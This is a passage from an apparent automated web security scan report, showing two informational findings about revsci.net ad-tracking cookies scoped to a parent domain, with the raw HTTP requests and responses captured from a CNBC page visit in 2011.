czQOSphK7T+fYdQNAvdcO7oFaZSZIhfUwHBau9UYI47haLTFopccDijSYMP8181PgmEfoIvflK3QEr/94glwixB8mAR8HTbXIM0pQiIcMmSCYvkiMGkMWISX5kX8g+22bTTVk/WjsoY7kqZpfeig8C2e84iw1Es+rMdhkrbVYoPgYEK2CKVhJvjiliUxHRTKMXmEBO6D25p0LAoPP0sPFe94t/E9WuTl9Q8UIyEZFuBaxM07q8cEGQ0IBkpRbeo8+MKfZ7TsM+JXYNlk6SnwQklyJ+bumypNTTPRVtOGSNzMXZUg4Ilpne2PE6HhBRq23WMAe40KATID/tUm"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMnUxjaMX8dB4bLdEzXH0Bzkglxgxifm4bVqt4LpZ6Z2LaGx1SrMuvvfXos1Y4bG6iTztEwUIwNLJUAZ52Q2cWjtmFe+Zr6mqja6lDLQSZuaxJeUX8rURuWyiJPXLj0R0c2CF0kBvq3OQf+cRoMKbq4XH6tE2DeCpboe+cnDDJZgSt6tgeDB7qFfWLRUPsLU7uupWZVoHg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iHQaGKvNWNbdWFELSWX4cgfi8hl0kZCcw6ceuLt9P2NpiUf/MYlTYoG5t5eHvBNiLT+2/Xfw8sDm5o/dr/lyyqoyewPJyXyn2THfveLvEUUW1Bd8zRg/TVdUvxerT8QtDBYEHnka4DI4frtTQyQAIds+150VrGBN8g6cvpozUNuNqXY3MQ2j16ELBNs9WLdXNDp5Yk9JuCrco7FVu9BCTHbH9rdTRNtiXCHNBoTHfIEHfbB/8ByQ0arGQb+g8WX8PeyjYFloHg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:03:43 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:03:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.144. http://pix04.revsci.net/I10985/b3/0/3/1008211/31221949.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/31221949.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwdoVl+MasTU0ubO+NOVEqMB5SuHqPlIcMQ/w6Se8zj4k4cE9YO7zjgPB7URf3kAfz+5iQ1zw3vuiM3r/TckuaflkljQAhmVSCSHb+JZkqdYPR9bqIQNe+1g/DwtERBSEZfzzKXV5RK/jWqBqeswgoo7pnibg6V7tJYgzNCqdbpw77QHRUtHFFnoVz91fCrKVSnd9KdSI3Z1WahAqH5m27RALV8jDVWT6L0Rjh6L5Voi28XVGkDrEZZW1tuA7/CBRQXV59cxlYxa59vJAQd6eHnGAQq5I6Dkt2R7yoqEmzD4LBH3ZS85QcgqYJ8zeOWeSZr47YcsFUA2OZFXqnmdsqPr1i8cw8b2X0/2QtJh4oBlsD6ALEYkKyqBeWepreKoVV7DsYHh4439ie74WprFUFjm2t0nNgDo+I3dP7E93Ox82wtO+gk5x6cxdWutYazkuEk5uTyaJbb2/JiEU9rR6Nw1VuCaDDvg1Udqpckrs+3gdo8X2mRce+f4M8WJ2UQMlHHuaxigcXc4y5OkRT6lytkrQCd+aGJaleRc92LE36wCDGV9m3G09myOHYUlqzwc7Zx06FXuvdUyXpNq8m7PF1sT21QexHLUkt/2IBTpDXjZUH2mRg/5Eo2FNNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:12:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/31221949.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_Zfml="MLsXtSENZjhvJ5H0GbXs8WIUqz53UCFmEpmTzu0Xoaf3EEev5M/krnpihGFj4llhxogiKhnwvCqNxuQEmN+UiflLT0VcDOmgWK9kXwuypqizTPpwsz7EycD7fgaSe0ZbzeLPot2BwjwxeJN/WXTaMQXC1n77CHcjb6QSodwo012F3tp08fDTNn5a9yq01Sk7gzLIHTmVMeqdbAFbDe8pjm6RFn+2yXaIFizuh0Es4n1fJvVZy6E1ZL32JGSOCSxu08M5H8Sn58mrKqfYmTqtgFe9qWEGG37sGCnIF/Crj/V4EhkAE+oLKvFj7Ah+Ehi6inxpb3A+rcPYY+OAqHU7eluvRn+fxq1pVK3VreTBO6GOeZC+XbHFt4kjYVTctKrM3/53V4nkd/1/VR8OeR/S0/thLrLqbUqxxUSc24M6YOzEX2mIxya+gCVQGEajkGTuYexW5yhgijFpTqBCYhZ0fxek6fUVuTQZqCCpYqYxomjgLonGImJZNvujwa6DKuo1B0oszSI5fFSdjRNoqvE9Frn8Ev1+K9VX8J5aiQyx9Ta7gA9LQbm7krehiD4QXv7N1iFoGlQzAYBvhQxgE4qhGM7ZIosmMoaAMsI6oPMrefDANUl3o/J9df5znULave5hGvBsaB04aG3VhnWJOqJWtfcV7C0DWDInnjZ5UtnWO8IroVX+I0mFQXzRTBmNYg3qP58pVtk4J/ULLVKxukxWtZoL5fUC8mEn1psd1nDNAXNsHx7Sue4l9KrgkosxGvDaFK2hYoJAfl2ODb1wqA+khDPKwvdNv7k4h2CiNIdgiHydehyT0EKYGvOWQJKr2TcM3xiMmkr0m3XIfbRXH6lbkJnQ2PJhcyVBCwx7EupOeTnIM8E4Dt66xSIGRzZMr9QFu+vfSKkLob/lmLHQLTS6bg22piEzgFHJIk2bx0fQHgYRkcwAE4e+0unesKZy4PHTI1AU9mlSaxbxlcDeHY5/TQFB0Rt7J7lVyty2qNP6RjgA8z1i5vxbD86CbgWmuSfLIAyS8jmwi/h8jUEHKUTlo7i3JkMn/XFlWFjwiwVvhPJfYci62IDociEJ15QY76Zbqx3hIfyWQVcWGQVwkbyXmOmZsm3C0doR86taOMBwLFwrePCLDJaW4tRi629L9wgCKGXcdU5eRmp5sMp6hEvluO3/YwtmxxRwYDQx71JG10gU0XAUnNJTaVRB1zAlfMQCTcvj6Em47Uxp6F4zvUjZZuCGEn+qRaziRzcFyNFJTugAcUQtYcbdhfwDH4mIjua9kDXA+vOshr9Sz8NldU8qnUGIu7ypKIEz115V7Qb33wItiuxmxAzZQaj/KD5JAnNxJOw7kcJRSjlPu7ffniOvbRJD1qU="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpX4jHtgBQLsFjyJCk8YM/Hg9p/4tnPpkX0UekQLN1cI4PqWAScMOu41CmA/EqNckNSZzTJMJ3dNC4tjBKAwpnXQSNw7Vh7NKfg2ZTxr6VIhhApCwl7qjRB5+Ep8GXOb5dQsHj5LMJFUGgcNazE16DMScpRZiC09IWK8DqoNAk2xoXYiu5MI5sgm+iFZVc78uuJinra4cuuDnoSFNDRIaa6nAipuVRpWKlWS8RzOXS1IJagcnbcPwWC+zM51WYftICb6V0ZlnbF9EyB5dp6g8XCjB0QIw0zXTh9fumTKyn5CiMtaykzY38tigK9viGi/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XqKBS91uulAbXZI66x1yCA1b/0pkFVZ6ASfX8mCVOA5yDWU9JEaRBUPh1uk3T39+wabLK1rUsJWTOpGN2v7undngZFWvukjFrfQDqbRNW238nT3DgquRaTu9pk4wnpOpJqqDDcZhTqm1twbnKVc262p7SI32tKRDNFMaxhYxVcI7DM7rF93p6UpsIp7QxarjdrHQgs8YUJCIRRMMMjJP13Xu2JCZakMvJ6gV11ug0p0o2YHgKZOGAM0+t+Ahw9OSqG1qiOH8cKfu5U2Uz+fW1cIpx1vLKbY/TB5Sp9lpObKnLiuB+6RbNM07iD7sApLvBwkmVaaMxtrO4wtWwPA21OLHS+D9FqVq3/bLE6svdBAwuAW9b97VUQXHUZJQC+LMyNhOe9O/w7j0XlrfqyiL/TUp4sRwiIdeFXJwsNPfqnNdeBCEZM978ug78IesbrO7bSoS3eczYGxbpw58MVALhstwshmZEceX722dcC8dDh3zf3gGHl2Hk7gBfLSaHAGT8VWC+iP/tvOT6qvay++mLGOoka8n2mlj89tb7EQEP0tIFJx5mxBLYgzTSkKgp8k+lr2WuWM4okUWVxgKfRSwRsdb7U0OWicRvr4P7oJ3wKSVkXQtlaKosJHSG2U/8qfWbT24s82+BA5UjgbSOT3o6LciSgqB1ME/cNfkHtaHHDmC/IH/xvgHanGDyLxqNGhJWHRbtt8OLWLWicwwUgeCA0qttICpNyxJ4M9fCPKtmQ31GE3cUeIHkgOXYPsKIpV4mOz0hv249OjuWv6gqauWvwRyxjoyPs6/L15Mq70NGnCvo3UH38MjYgJgZp30E5tYXjmSsBoClGY4OqOwJn94BLAmqkd5VRS5iB1HcaJ344awqw6VhUK39SvvLrgg+46ug+YQwbmhSgH0p/4NX8y4PargMhCX1JpayOFkNqUjgSiNlHaKTXgWl6biJHD4hPQst1wOfu2IMYgOHBK1t1BqzVu8Vn99lQjiRX7+f+T9GntQtepWq8tyZg3ToaZSoTb0oiWgCog0gjC7ND2A7ZN/fBDTtdG8CVrgPfuPgalZTsmyVf/sh/nvqsmlG32nwe5B4XqY5ZAJZXDpJ3QS9rd33I1VhizTY6RcRrBhO/AajPGY2V/5GZMzfdR2tIGrbO4kUVYZhakJuOVvP7IQ7IVx9VH/GTJ0a/hTtQbGiFsVwrM33nC8kJqkhFJ+SNzaPWzCCyz+QPg2WZ2nt4g/8I3JTnrW+c5xrtC2bt4tKNwZpgAvdQc9MG3LoxaUVtCSm3U4YnwXSKaHZ88+oHqNtYInlBVRujtDmtbgJp9A65r1JlvTCaG/LUtomX2lPD9VBzbJeur9tdbuUxzAaZp46JHNmHX7YrZgcb5uiO9WRPVvModDgvlhiu7Fd6+Zf5Zg="; rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/woLigEF+ZbuLaBT2sir9v5vw/ZUuJEqMB5SuHqPlIcMQ/w6XdX6zWuEUaXfqbTAIvGV2fYtsNz7Ao3U4T4y6Hg1xOFc7lkMSklFjL3lv1heOLinphznJw8dBFO3OFe+1g/DwtENLfuP9RZeo5cBYNGcn0yl9snoo7pnibg6V7tJYgzNCqdbpw77QHRUtHyJO9XniqjHYgyt5UdzWCgiTmgIdz/cJLToegkozS+b6sYF8HShYIjecdIQm2Jh600+l09rXwXl7KXIogFmw8aSvkZGw0a1Sck3WHb+AAE2FhEvNI07pmNFdTjX/01lHFM20uXgEn3AdHtJ81zxnAipSNuC1rBBDvciz/cSu0RL4stthC3Rfxse1DCp0WlBfygHpF7szKURxbsonJV8ozucBFAXUeBhwZrKo4LB4ZFQpZukKFTYv2z4XWUNW3f5vUXajJks0lTP4YaS2XeBrS4bvfjM4mVeuJk+kn1IxzVpwWrlabEm5lt0ikrpLQZyebh2BAz1y7hMfW0Vse/TabpPdHMKQ91KENRG1JVHnfAC5MyR9AKlOkVbhaWOSGXv+auXfwYpbEfWJRyYVX6IxvpB/2oo2OaQyuD+Oe5jUVhPy8rwGB775SShwi8SpOmUN8MQxNswP04

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwdoVl+MasTU0ubO+NOVEqMB5SuHqPlIcMQ/w6Se8zj4k4cE9YO7zjgPB7URf3kAfz+5iQ1zw3vuiM3r/TckuaflkljQAhmVSCSHb+JZkqdYPR9bqIQNe+1g/DwtERBSEZfzzKXV5RK/jWqBqeswgoo7pnibg6V7tJYgzNCqdbpw77QHRUtHFFnoVz91fCrKVSnd9KdSI3Z1WahAqH5m27RALV8jDVWT6L0Rjh6L5Voi28XVGkDrEZZW1tuA7/CBRQXV59cxlYxa59vJAQd6eHnGAQq5I6Dkt2R7yoqEmzD4LBH3ZS85QcgqYJ8zeOWeSZr47YcsFUA2OZFXqnmdsqPr1i8cw8b2X0/2QtJh4oBlsD6ALEYkKyqBeWepreKoVV7DsYHh4439ie74WprFUFjm2t0nNgDo+I3dP7E93Ox82wtO+gk5x6cxdWutYazkuEk5uTyaJbb2/JiEU9rR6Nw1VuCaDDvg1Udqpckrs+3gdo8X2mRce+f4M8WJ2UQMlHHuaxigcXc4y5OkRT6lytkrQCd+aGJaleRc92LE36wCDGV9m3G09myOHYUlqzwc7Zx06FXuvdUyXpNq8m7PF1sT21QexHLUkt/2IBTpDXjZUH2mRg/5Eo2FNNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:12:50 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:12:50 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.145. http://pix04.revsci.net/I10985/b3/0/3/1008211/319879025.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/319879025.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JI870HCMovZvWZcKlAgNqH/8UCkWVUlX3IzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs2oKNN8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:52:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/319879025.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
